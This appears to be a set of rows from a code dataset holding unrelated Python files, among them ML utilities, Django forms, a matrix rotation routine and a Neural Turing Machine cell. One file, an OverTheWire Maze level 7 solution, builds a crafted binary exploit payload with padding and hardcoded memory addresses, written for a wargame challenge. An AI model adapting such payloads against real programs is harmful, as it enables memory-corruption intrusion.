] | permissive | eastwoodknight/ef_python | 2af8374eb33adfa9424469979f33bed330692581 | 1d7efff2ee8caf4c66d8e812ce296f355d2f415f | refs/heads/master | 2020-03-24T17:22:44.814989 | 2018-07-28T16:01:06 | 2018-07-28T16:01:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,055 | py | __all__ = ['SpatialMesh', 'SpatialMeshConf']
from collections import namedtuple
import numpy as np
from ef.config.section import register, ConfigSection
from ef.config.component import ConfigComponent
class SpatialMesh(ConfigComponent):
def __init__(self, size=(10, 10, 10), step=(1, 1, 1)):
self.size = np.array(size, np.float)
self.step = np.array(step, np.float)
def visualize(self, visualizer):
visualizer.draw_box(self.size, wireframe=True, label='volume', colors='k', linewidths=1)
def to_conf(self):
X, Y, Z = self.size
x, y, z = self.step
return SpatialMeshConf(X, x, Y, y, Z, z)
@register
class SpatialMeshConf(ConfigSection):
section = "Spatial mesh"
ContentTuple = namedtuple("SpatialMeshTuple", ('grid_x_size', 'grid_x_step', 'grid_y_size',
'grid_y_step', 'grid_z_size', 'grid_z_step'))
convert = ContentTuple(*[float] * 6)
def make(self):
return SpatialMesh(self.content[::2], self.content[1::2])
| [
"kadivas@jinr.ru"
] | kadivas@jinr.ru |
521d0b159fd5a4aa0f1bd0c079cc755d840d931e | b88c7f892b4ec97a1bfecc1ca15b4014f3d9257e | /nasbench_asr/training/tf/callbacks/tensorboard.py | 9b01e58ff9e6e3631d70715a538096d7d138c970 | [
"Apache-2.0"
] | permissive | akhauriyash/nb-asr | 66b0d1dcf5c769763bb2945c130e17756c523164 | 8889f37081ebbde253da1589d13fe3bc9ccd9ef8 | refs/heads/main | 2023-06-23T05:20:41.390868 | 2021-07-22T20:50:51 | 2021-07-22T20:50:51 | 388,593,693 | 0 | 0 | Apache-2.0 | 2021-07-22T20:50:18 | 2021-07-22T20:50:17 | null | UTF-8 | Python | false | false | 1,029 | py | from nasbench_asr.quiet_tensorflow import tensorflow as tf
class Tensorboard(tf.keras.callbacks.Callback):
"""
A simple TensorBoard callback
"""
def __init__(self, log_dir, update_freq=10):
super().__init__()
self.log_dir = log_dir
self.update_freq = update_freq
self.file_writer_train = tf.summary.create_file_writer(str(log_dir / "train"))
self.file_writer_val = tf.summary.create_file_writer(str(log_dir / "val"))
self.step = 0
def on_train_batch_end(self, batch, logs=None):
logs = logs or {}
if self.step % self.update_freq == 0:
with self.file_writer_train.as_default():
for k, val in logs.items():
tf.summary.scalar("batch/" + k, data=val, step=self.step)
self.step += 1
def on_epoch_end(self, epoch, logs=None):
with self.file_writer_val.as_default():
for k, val in logs.items():
tf.summary.scalar("epoch/" + k, data=val, step=epoch+1)
| [
"l.dudziak@samsung.com"
] | l.dudziak@samsung.com |
a5884ee6e2de27f4e699d752637c75776639e729 | 33b35aee26d4c84e2b065882e9b428d57e1df5fa | /pyensemble/pruning/overall.py | f7090d9b854367b1c271dbf56d49e5b23b8a0ec8 | [] | no_license | eustomaqua/PyEnsemble | 33405039a45f723dbaa2cee0ed6080269e15d82e | 4f3c74beba4c3a6f7ed31e3ada1179166b9292f2 | refs/heads/master | 2020-06-23T09:37:15.605252 | 2020-04-19T04:39:26 | 2020-04-19T04:39:26 | 198,586,714 | 8 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,517 | py | # coding: utf8
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from copy import deepcopy
import numpy as np
# from pyensemble.pruning import RANKING_BASED
# from pyensemble.pruning import OPTIMIZATION_BASED
# from pyensemble.pruning import COMPOSABLE_CORE_SETS
# from pyensemble.pruning import AVAILABLE_NAME_PRUNE
from pyensemble.pruning.ranking_based import Early_Stopping as ES
from pyensemble.pruning.ranking_based import KL_divergence_Pruning as KL
from pyensemble.pruning.ranking_based import KL_divergence_Pruning_modify as KLplus
from pyensemble.pruning.ranking_based import Kappa_Pruning as KP
from pyensemble.pruning.ranking_based import Orientation_Ordering_Pruning as OO
from pyensemble.pruning.ranking_based import Reduce_Error_Pruning as RE
from pyensemble.pruning.composable import GMM_Algorithm as GMM
from pyensemble.pruning.composable import Local_Search_Alg as LCS
from pyensemble.pruning.optimization_based import DREP as DREP
from pyensemble.pruning.ranking_based import OEP_inPEP as OEP
from pyensemble.pruning.optimization_based import SEP_inPEP as SEP
from pyensemble.pruning.optimization_based import PEP_inPEP as PEP
from pyensemble.pruning.optimization_based import PEP_modify as PEPplus
#==================================
# Overall interface
#==================================
#----------------------------------
# Overall interface
#----------------------------------
def existing_contrastive_pruning_method(name_pru, yt, y, nb_cls, nb_pru, rho=None, epsilon=1e-3):
#@ params: name_prune
# self._name_pru_set = ['ES','KL','KL+','KP','OO','RE', 'GMM','LCS', 'DREP','SEP','OEP','PEP','PEP+']
rho = nb_pru / nb_cls if not rho else rho
# epsilon = 1e-6
# print("rho = {}\nepsilon = {}".format(rho, epsilon))
#
if name_pru == 'ES':
yo, P = ES.Early_Stopping( yt, nb_cls, nb_pru)
elif name_pru == 'KL':
yo, P = KL.KL_divergence_Pruning( yt, nb_cls, nb_pru)
elif name_pru == 'KL+':
yo, P = KLplus.KL_divergence_Pruning_modify(yt, nb_cls, nb_pru)
elif name_pru == 'KP':
yo, P = KP.Kappa_Pruning( yt, y, nb_cls, nb_pru)
elif name_pru == 'OO':
yo, P, flag = OO.Orientation_Ordering_Pruning(yt, y)
elif name_pru == 'RE':
yo, P = RE.Reduce_Error_Pruning( yt, y, nb_cls, nb_pru)
elif name_pru == 'GMM': # 'GMM_Algorithm'
yo, P = GMM.GMM_Algorithm( yt, y, nb_cls, nb_pru)
elif name_pru == 'LCS': # 'Local_Search':
yo, P = LCS.Local_Search( yt, y, nb_cls, nb_pru, epsilon)
elif name_pru == 'DREP':
yo, P = DREP.DREP_Pruning( yt, y, nb_cls, rho)
elif name_pru == 'SEP':
yo, P = SEP.PEP_SEP( yt, y, nb_cls, rho)
elif name_pru == 'OEP':
yo, P = OEP.PEP_OEP( yt, y, nb_cls)
elif name_pru == 'PEP':
yo, P = PEP.PEP_PEP( yt, y, nb_cls, rho)
elif name_pru == 'PEP+':
yo, P = PEPplus.PEP_PEP_modify( yt, y, nb_cls, rho)
else:
raise UserWarning("LookupError! Check the `name_prune`.")
#
if name_pru != 'OO':
flag = None
# P = np.where(np.array(P) == True)[0].tolist()
P = np.where(P)[0].tolist()
return deepcopy(yo), deepcopy(P), flag
| [
"yjbian92@gmail.com"
] | yjbian92@gmail.com |
2df0087c181223969f1778538a30039b736953f6 | a1105b30823ae17720fa3353d33d0135808c66f8 | /library.py | 5b6ca2630b528a7003621211fac6c4d89b892e7a | [] | no_license | yonaspassos/Desafio_Zygo_S1 | 0bc5f2c58b8cf4323fc82f4faf3d82ce0e2e7fb3 | 7b586036482f67e2865ceb0323d25b5c81905d16 | refs/heads/master | 2022-02-21T19:38:50.787387 | 2019-09-29T23:27:54 | 2019-09-29T23:27:54 | 208,924,780 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,021 | py | import json, sys
def read_file():
with open("books.json", "r") as file:
return json.load(file)
def get_book_title(book):
return book["book_title"]
def get_author_book(author):
return author["author"]
def get_year_book(year):
return year["edition_year"]
def sort(sort_direction):
if sort_direction is None:
return "Ordering Exception"
if len(sort_direction) == 0:
return []
books = read_file()
if sort_direction.get("title"):
books = sorted(books, key=get_book_title, reverse=(sort_direction["title"] == "desc"))
if sort_direction.get("author"):
books = sorted(books, key=get_author_book, reverse=(sort_direction["author"] == "desc"))
if sort_direction.get("edition_year"):
books = sorted(books, key=get_year_book, reverse=(sort_direction["edition_year"] == "desc"))
return books
if __name__ == "__main__":
params = None
if len(sys.argv) >= 2:
params = json.load(open(sys.argv[1]))
print(sort(params))
| [
"yona.nantes22@gmail.com"
] | yona.nantes22@gmail.com |
3cbb57e4a7165e2ed5af97716ff49f05db1aadca | fb6edcc4b50ab78462b8e14240b053ccf0b4ebbc | /src/user-py/src/module_executor.py | 5c78f5051b94417c3411b2176847e382d55a2953 | [
"MIT"
] | permissive | yutouhewo/skull | c8809f54b8750244dd8c305aded55e7c144ecf91 | 3990cc78f5bf9580280af516267052a89b088162 | refs/heads/master | 2020-12-24T06:14:16.101185 | 2016-10-31T02:10:27 | 2016-10-31T02:10:27 | 73,163,616 | 1 | 0 | null | 2016-11-08T08:09:01 | 2016-11-08T08:09:01 | null | UTF-8 | Python | false | false | 1,040 | py | # Skull Module Executor
import skullpy.txn as Txn
import skullpy.txndata as TxnData
def run_module_init(init_func, config):
init_func(config)
def run_module_release(release_func):
release_func()
def run_module_run(run_func, skull_txn):
try:
txn = Txn.Txn(skull_txn)
ret = run_func(txn)
txn.storeMsgData()
return ret
except Exception as e:
return False
def run_module_unpack(unpack_func, skull_txn, data):
txn = Txn.Txn(skull_txn)
try:
consumed_length = unpack_func(txn, data)
txn.storeMsgData()
if consumed_length is None:
return -1
return int(consumed_length)
except Exception as e:
return -1 # Error occurred
def run_module_pack(pack_func, skull_txn, skull_txndata):
txn = Txn.Txn(skull_txn)
txndata = TxnData.TxnData(skull_txndata)
try:
pack_func(txn, txndata)
except Exception as e:
print "Failed to run_module_pack: {}".format(e)
finally:
txn.destroyMsgData()
| [
"hyzwowtools@gmail.com"
] | hyzwowtools@gmail.com |
db5aad1fd1249802143125324cb70af8b14e528b | 48c46cee10379dd3bb77ba1b2b4954bcc7eb9d08 | /OverTheWire/Maze/lvl7/s2.py | e402d838c5fbcbe169c06c7997be194c112d3867 | [] | no_license | Deeby/Pwnables-and-Sploits | 1423b72ad7e1a59c761961430d2638ecfe0bd5f6 | 58bd6bd658943893ccd9a60b3e6a4ec2dade491a | refs/heads/master | 2020-09-09T06:57:08.831062 | 2018-12-06T17:31:51 | 2018-12-06T17:31:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 311 | py | def main():
payload = "A"*32+"\x34\x00\x00\x00"+"A"*10+"\x48\x00"+"\x01\x00"+"\x00\x00"+"\x00"*20+"\x10\x00\x00\x00"+"\x00"*16+"\x38\xa0\x04\x08"+"AAAA"+"\x08\xa0\x04\x08"+"\x02\x00\x00\x00"+"A"*8+"ebp-"+"\x1b\xdf\xff\xff"
fp = open("test.txt","wb")
fp.write(payload)
fp.close()
pass
main()
| [
"sneakynachos@gmail.com"
] | sneakynachos@gmail.com |
802d3c1e08f8200c2aaf70ec20fc1e5d8b069afb | f8eb12aac7e4b73039b4a757f88b1ebe30d26565 | /ntm/ntm_cell.py | 9a8399ffcfb8ed472be1100accf7373f53b8ae48 | [] | no_license | josh-tobin/tf_ntm | df1bd66afe9f6353e777753383f7b3b0c733108a | 778cdab319fc95ddb6a44eb9c2b2ecb74a5685a8 | refs/heads/master | 2021-01-17T18:32:28.300801 | 2016-06-15T05:14:15 | 2016-06-15T05:14:15 | 61,179,254 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,859 | py | import sys
from os import path
import tensorflow as tf
sys.path.append('/'.join(str.split(path.abspath(__file__), '/')[:-2]))
from ntm.head import ReadHead
from ntm.head import WriteHead
from network.cell import Cell
from network.layers import IdentityLayer
"""
TODO
- Documentation
"""
class NTMCell(Cell):
def __init__(self, controller_network, memory_size, batch_size,
read_head='default', write_head='default', output_net='default',
head_hidden_size=32):
"""
NTMCell represents a single timestep of a Neural Turing Machine.
:param controller_network: The controller maps the input x_t, previous
read vector r_tm1, and optionally previous
controller statem s_tm1 to a state s_t
:param memory_size:
:param batch_size:
:param read_head:
:param write_head:
:param output_net:
"""
super(NTMCell, self).__init__()
self._batch_size = batch_size
self._controller_network = controller_network
if read_head == 'default':
self._read_head = ReadHead(controller_network.output_shape, memory_size,
batch_size=batch_size,
hidden_size=head_hidden_size)
else:
self._read_head = read_head
if write_head == 'default':
self._write_head = WriteHead(controller_network.output_shape, memory_size,
batch_size=batch_size,
hidden_size=head_hidden_size)
else:
self._write_head = write_head
if output_net == 'default':
self._output_net = IdentityLayer()
else:
self._output_net = output_net
self._memory_size = memory_size
self._check_input()
def default_state(self):
r_0 = tf.Variable(tf.zeros([self._batch_size, self._memory_size[1]]),
trainable=False)
if self._controller_network.default_state():
s_0 = self._controller_network.default_state()
else:
s_0 = tf.Variable(tf.zeros([self._batch_size,
self._controller_network.output_shape]),
trainable=False)
memory_0 = tf.Variable(tf.zeros([self._batch_size]
+ list(self._memory_size)),
trainable=False)
state = [r_0, s_0, memory_0, self._read_head.default_state(),
self._write_head.default_state()]
return state
def _check_input(self):
assert isinstance(self._controller_network, Cell)
assert isinstance(self._read_head, ReadHead)
assert isinstance(self._write_head, WriteHead)
# The controller network should be compatible with the heads
#assert self._read_head.state_size == self._controller_network.output_spec
#assert self._write_head.state_size == self._controller_network.output_spec
# TODO: finish. Probably need to be more careful about input / output specs.
def call(self, x_t, r_tm1, s_tm1, memory_tm1, read_args, write_args):
s_t, _ = self._controller_network([x_t, r_tm1], s_tm1)
y_t, _ = self._output_net(s_t)
r_t, read_state = self._read_head([s_t, memory_tm1], *read_args)
memory_t, write_state = self._write_head(s_t, memory_tm1, *write_args)
return y_t, [r_t, s_t, memory_tm1, read_state, write_state]
def __call__(self, x, *state):
r_tm1 = state[0]
s_tm1 = state[1]
memory_tm1 = state[2]
read_args = state[3]
write_args = state[4]
return self.call(x, r_tm1, s_tm1, memory_tm1, read_args, write_args)
| [
"joshp.tobin@gmail.com"
] | joshp.tobin@gmail.com |
9e86b3518912ee7ce4ce5497fb45ab9c6eb765ab | 295ecf4f254c42e9201657ef0a13ec2c68c40c9b | /info/views.py | 6a2850c2b723ff267061ff6b95988447a8586342 | [] | no_license | zwolf21/StockAdmin-pre2 | 0236061284a6fe8801591608591d21129d4ea7c0 | b21d069ff215c17ce3bca040ecf9b8f48b452ed4 | refs/heads/master | 2021-05-01T09:28:59.818469 | 2016-11-30T17:33:30 | 2016-11-30T17:33:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,923 | py | from django.shortcuts import render, render_to_response
from django.core.urlresolvers import reverse_lazy
from django.views.generic.edit import FormView
from django.views.generic import ListView, DetailView, CreateView, TemplateView
from django.conf import settings
from django.db.models import Q
import os, sys
from .models import Info
from .forms import XlFileForm
from .modules.utils import xlDB2DicIter, is_xlfile
from django.utils import simplejson
from django.http import HttpResponse
# Create your views here.
class DrugInfoFromXlFile(FormView):
form_class = XlFileForm
template_name = 'info/get_xlfile_form.html'
def form_valid(self, form):
recreate = form.cleaned_data['recreate']
xlfile = self.request.FILES['xlfile']
if not is_xlfile(xlfile.name):
context = {
'error_message': '파일 형식이 일치하지 않습니다',
'file_name' : xlfile.name
}
return render_to_response('info/update_failure.html', context)
temp_file = os.path.join(settings.MEDIA_ROOT,'temp.xls')
with open(temp_file, 'wb') as fp:
fp.write(xlfile.read())
di_table = xlDB2DicIter(temp_file)
os.remove(temp_file)
src_field_set = set(di_table[0])
essential_field_set = {'약품코드','EDI코드','약품명(한글)','제약회사명','일반단가','수가명','규격단위'}
if not essential_field_set < src_field_set:
context = {
'error_message' : '엑셀파일에 지정된 필수 컬럼(열) 항목이 없습니다',
'essential_fields' : essential_field_set,
'missing_fields' : essential_field_set - src_field_set,
'input_file_fields': src_field_set,
'file_name' : xlfile.name
}
return render_to_response('info/update_failure.html', context)
if recreate:
Info.objects.all().delete()
context = {
'success_count' : 0,
'failure_count' : 0,
'failures' : [],
'why' : ''
}
success_count = 0
for row in di_table:
try:
Info.objects.create(
edi = int(row['EDI코드']),
code = row['약품코드'],
name = row['약품명(한글)'],
name_as = row['수가명'],
firm = row['제약회사명'],
price = row['일반단가'],
pkg_amount = row.get('포장단위') or 1,
standard_unit = row['규격단위'],
narcotic_class = int(row.get('약품법적구분') or 0)
)
except:
exception = {}
type_err, val_err, trcbk = sys.exc_info()
context['failures'].append({
'error_type': type_err.__name__,
'error_value': val_err,
'error_drug_name': row.get('약품명(한글)','약품명 미지정'),
'error_drug_code': row.get('약품코드','약품코드 미지정')
})
context['failure_count']+=1
else:
context['success_count']+=1
context['total_count'] = context['failure_count']+context['success_count']
return render_to_response('info/update_result.html', context)
class IndexTV(TemplateView):
template_name = "info/drug_info.html"
| [
"pbr112@naver.com"
] | pbr112@naver.com |
eb026a8262f35b328733bac6b2561e4aa08976fa | cdafb14fe1f4e334960c91b2f53bc7e48b40a93c | /calculator/cal01.py | 6e390e7e0a24cc606412a0c4570c84f7f68c0863 | [] | no_license | alireza-E/alireza- | b15801d8c194fd82990f602d2759d2b67f1d5ec6 | b577ff8a6d81672ce9126e1bdd4ee603458f3207 | refs/heads/master | 2022-12-24T05:41:12.098687 | 2020-10-04T13:40:30 | 2020-10-04T13:40:30 | 301,139,516 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 339 | py |
class cal() :
def __init__(self, x, y):
self.x = x
self.y = y
def mul(self):
a =(self.x*self.y)
return a
def div(self):
a =(self.x/self.y)
return a
def plus(self):
a =(self.x+self.y)
return a
def neg(self):
a = (self.x - self.y)
return a | [
"Rominash@gmail.com"
] | Rominash@gmail.com |
382ef2aeab005733bc9cbd35416e65ce87242c75 | 93ab9665078d49028e5094e23d673574031d47e5 | /Time_Complexity/matrix_rotation_anticlockwise.py | 69db9f542194a4f504d04d3b302945e8196abc37 | [] | no_license | raghulrage/Python-programs | 7072429108c2932323b5f636d06f97a07c4cb6a4 | 8d134fade8626c99237c48068a2d1f5c6b04a0cc | refs/heads/master | 2023-05-05T23:11:36.407458 | 2020-10-17T05:45:58 | 2020-10-17T05:45:58 | 198,346,485 | 1 | 9 | null | 2021-05-22T12:50:28 | 2019-07-23T03:41:20 | Python | UTF-8 | Python | false | false | 1,977 | py | def reverse(arr, i, j):
for idx in range((j - i + 1) // 2):
arr[i + idx], arr[j - idx] = arr[j - idx], arr[i + idx]
def rotateList(A, K):
l = len(A)
K %= len(A)
reverse(A, l - K, l - 1)
reverse(A, 0, l - K - 1)
reverse(A, 0, l - 1)
return A
def rotateLayers(N, M, R, layers):
for layer in layers:
rotateList(layer, len(layer) - R)
def rotateMatrix(M, N, R, mat):
l = int(min(N, M) // 2)
layers = [[] for _ in range(l)]
for level in range(l):
top = (N - 1) - 2 * level
side = (M - 1) - 2 * level
for i in range(top): # right
layers[level].append(mat[level][level + i])
for j in range(side): # down
layers[level].append(mat[level + j][level + top])
for i in range(top): # left
layers[level].append(mat[level + side][level + top - i])
for j in range(side): # up
layers[level].append(mat[level + side - j][level])
# rotate each layer
rotateLayers(N, M, R, layers)
# fill the layers back in
for level in range(l):
top = (N - 1) - 2 * level
side = (M - 1) - 2 * level
for i in range(top):
mat[level][level + i] = layers[level].pop(0) # right
for j in range(side):
mat[level + j][level + top] = layers[level].pop(0) # down
for i in range(top):
mat[level + side][level + top - i] = layers[level].pop(0) # left
for j in range(side):
mat[level + side - j][level] = layers[level].pop(0) # up
def main():
# M, N, R = map(int, raw_input().split())
mat = []
M, N, R = 4,4,1
# for i in range(M):
# mat.append(list(map(int, raw_input().split())))
mat = [ [1,2,3,4],
[5,6,7,8],
[9,10,11,12],
[13,14,15,16]
]
rotateMatrix(M, N, R, mat)
for i in mat:
print(*i)
if __name__ == '__main__':
main()
| [
"noreply@github.com"
] | raghulrage.noreply@github.com |
3a2f9c0807524842512155fb4b75e01efa769efa | 27152f64815b0200c46a8187146e43258beba462 | /take2/w5/SuperUglyNumber.py | d4ca62c25365565276068eb3bce06336c75bebad | [] | no_license | NahusenayH/ComptetiveProgramming | 8ec6ca7ccaf32148c2f958c521b90a8efca3b9f0 | 30b3db60b0d8d105695c2b8418ef8d4c5d317e57 | refs/heads/master | 2021-07-22T14:31:23.683235 | 2020-10-09T12:29:22 | 2020-10-09T12:29:22 | 224,041,330 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 586 | py | import heapq
class Solution:
def nthSuperUglyNumber(self, n: int, primes: List[int]) -> int:
count = [0] * len(primes)
res = [0] * n
res[0] = 1
for i in range(1,n):
minm = float(inf)
for j in range(0,len(primes)):
minm = float(min(minm,primes[j]*res[count[j]]))
res[i] = int(minm)
for j in range(0,len(count)):
if ((res[count[j]] * primes[j]) == int(minm)):
count[j] += 1
return res[-1] | [
"haile.nahu18@gmail.com"
] | haile.nahu18@gmail.com |
50f14085ebf1fa050502627f08de7bacfbbf9444 | 74c04ef3ed2bc71e728b3bb840c927a86352c6e1 | /djangotesting/jango/resturant/forms.py | 226cb77012fce96d306543ca927164a3764be1ac | [] | no_license | zamanehsani/restaurant | 06b658b277dda8fa8d4f5b598d389767ab61f876 | 0f21ce268fdc21402c32dee1ecc64850a24fcc2a | refs/heads/main | 2023-01-12T04:52:09.541112 | 2020-11-16T05:44:04 | 2020-11-16T05:44:04 | 313,192,805 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 860 | py | from django import forms
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
from resturant.models import Profile
class UserRegisterForm(UserCreationForm):
email = forms.EmailField()
first_name = forms.CharField(max_length=150)
last_name = forms.CharField(max_length=150)
class Meta:
model = User
fields =['first_name','last_name','username', 'email', 'password1', 'password2']
class UserUpdateForm(forms.ModelForm):
# email = forms.EmailField()
# first_name = forms.CharField(max_length=150)
# last_name = forms.CharField(max_length=150)
class Meta:
model = User
fields =['first_name','last_name','username', 'email']
class UserProfileUpdateForm(forms.ModelForm):
class Meta:
model = Profile
fields =['image', 'gender'] | [
"zamanehsani@gmail.com"
] | zamanehsani@gmail.com |
c042e963a867292d5e31a6b9ec9e335cb64f584b | 4b9eaaa8a28c3114c2f60b47b89b4acc05a73ff8 | /venv/Scripts/pip3.8-script.py | f810f5f84dca9aa79b81fd35cc163f9ff2a4daa4 | [] | no_license | ronigold/Jupytext_test_2 | 080a9e308f8b10d5e7d2ea3ced02fd66a92c5457 | 90a018f6ab5bcce15522f45f2d2a66aba4ac52ad | refs/heads/master | 2021-05-24T07:40:22.531855 | 2020-04-06T09:46:43 | 2020-04-06T09:46:43 | 253,454,935 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 431 | py | #!C:\Users\rgoldshmidt\PycharmProjects\Jupytext_test_1\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip3.8'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==19.0.3', 'console_scripts', 'pip3.8')()
)
| [
"ronigoldsmid@gmail.com"
] | ronigoldsmid@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.